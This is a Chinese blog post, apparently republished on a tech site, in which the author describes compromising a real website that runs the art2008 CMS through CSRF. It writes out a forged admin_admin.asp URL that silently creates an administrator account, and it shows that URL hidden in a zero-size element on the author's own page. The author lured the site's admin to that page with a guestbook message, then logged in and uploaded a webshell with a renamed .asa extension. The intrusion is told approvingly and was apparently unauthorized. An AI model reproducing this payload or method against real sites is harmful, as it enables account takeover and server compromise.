一次基于CSRF下的攻击实例

安全 黑客攻防
最近想测试一下用CSRF来搞一个站有多快?

最近想测试一下用CSRF来搞一个站有多快?  于是乎就测试了一下,结果还是挺让人满意的。废话不多说了, 切入正题。 文章没技术含量,望高手别捧腹大笑 - -||

我从源码站里下了一套源码,名曰:art2008  我是从增加管理员这里进行CSRF的, 同过抓包 我发现,构造一个链接如:

http://www.xxx.com/admin/admin_admin.asp?
action=savenew&username=11111&PrUserName=11111&
passwd=123456&passwd2=123456&sex=%CF%C8%C9%FA
&
fullname=%B9%FE%B9%FE&email=xss@qq.com&
depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+[code]

就能够自动增加一个管理员,  于是乎测试了一下,发现可以增加。然后便开始找对象进行试验..

google了一下 , 找了个管理员经常上的网站进行了测试, 然后我先是在自己空间上建立了以个test.htm 代码如下:

[code]你喜欢包拯吗? 
http://www.xxx(名字略).com/admin/admin_admin.asp?
action=savenew&username=111111&
PrUserName=111111&passwd=123456&
passwd2=123456&sex=%CF%C8%C9%FA&
fullname=%B9%FE%B9%FE&email=xss@qq.com&
depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+" width="0" height="100">

然后找到那个网站的留言板,开始留言,如图:

 

当管理员访问我的网站时候,他便被CSRF了。。 就在此后, 我便去玩CS了,战绩还不错- - 杀16死5.

当我回来时候,管理员已经回复了(- - ||真快阿)如图:

 

管理员应该访问了我的网站,于是我迅雷不及掩耳之势的跑去后台看看有没有成功增加,用户名:111111 密码:123456  结果成功登陆了!! 如图:

 

后台后个上传,改了一下扩展名asa  ,马儿便飞到了服务器上,  如图:

 

大概计算了一下,一共花费了约30分钟左右的时间。

【编辑推荐】

  1. Web安全测试之跨站请求伪造(CSRF)篇
  2. IE8与点击绑架和CSRF的攻防战
责任编辑:佚名 来源: 安全中国
相关推荐

2020-06-11 11:16:36

戴尔

2014-08-01 14:06:45

2020-04-08 10:30:19

Linux 攻击 安全

2021-05-31 10:23:10

恶意软件攻击网络安全

2013-12-12 10:28:04

2011-06-28 10:41:50

DBA

2019-03-04 10:51:08

2012-07-24 08:54:15

2020-09-04 16:38:01

网络攻击勒索软件数据泄露

2020-04-17 10:53:38

钓鱼邮件网络攻击冠状病毒

2020-10-27 10:35:38

优化代码项目

2012-11-30 14:35:17

2021-06-03 10:16:12

CSRF攻击SpringBoot

2024-09-26 10:41:31

2017-10-18 09:06:41

2021-12-27 10:08:16

Python编程语言

2020-10-24 13:50:59

Python编程语言

2020-11-13 10:10:49

网络攻击信息泄露勒索软件

2010-05-27 10:00:09

2020-07-30 13:30:11

勒索病毒
点赞
收藏

51CTO技术栈公众号